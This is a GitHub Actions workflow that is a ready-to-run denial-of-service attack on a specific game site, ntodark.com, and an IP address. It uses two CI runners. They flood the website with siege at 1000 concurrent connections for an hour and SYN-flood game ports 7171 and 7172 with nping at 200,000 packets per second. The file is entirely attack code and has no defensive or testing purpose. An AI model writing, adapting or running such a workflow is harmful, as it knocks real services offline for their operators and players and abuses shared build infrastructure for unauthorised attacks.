name: ntodark
on:
  workflow_dispatch:

jobs:
  flood:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        runner: [1,2]
    steps:
      - name: Install tools
        run: |
          sudo apt-get update -qq
          sudo apt-get install -y siege nping
      - name: Attack website
        run: |
          siege -c 1000 -t 3600s http://ntodark.com &
          siege -c 1000 -t 3600s https://ntodark.com &
          sleep 3600
      - name: Attack game ports
        run: |
          # SYN flood nas portas 7171 e 7172
          nping --tcp -p 7171 --flags SYN --rate 200000 34.151.221.105 &
          nping --tcp -p 7172 --flags SYN --rate 200000 34.151.221.105 &
          sleep 3600

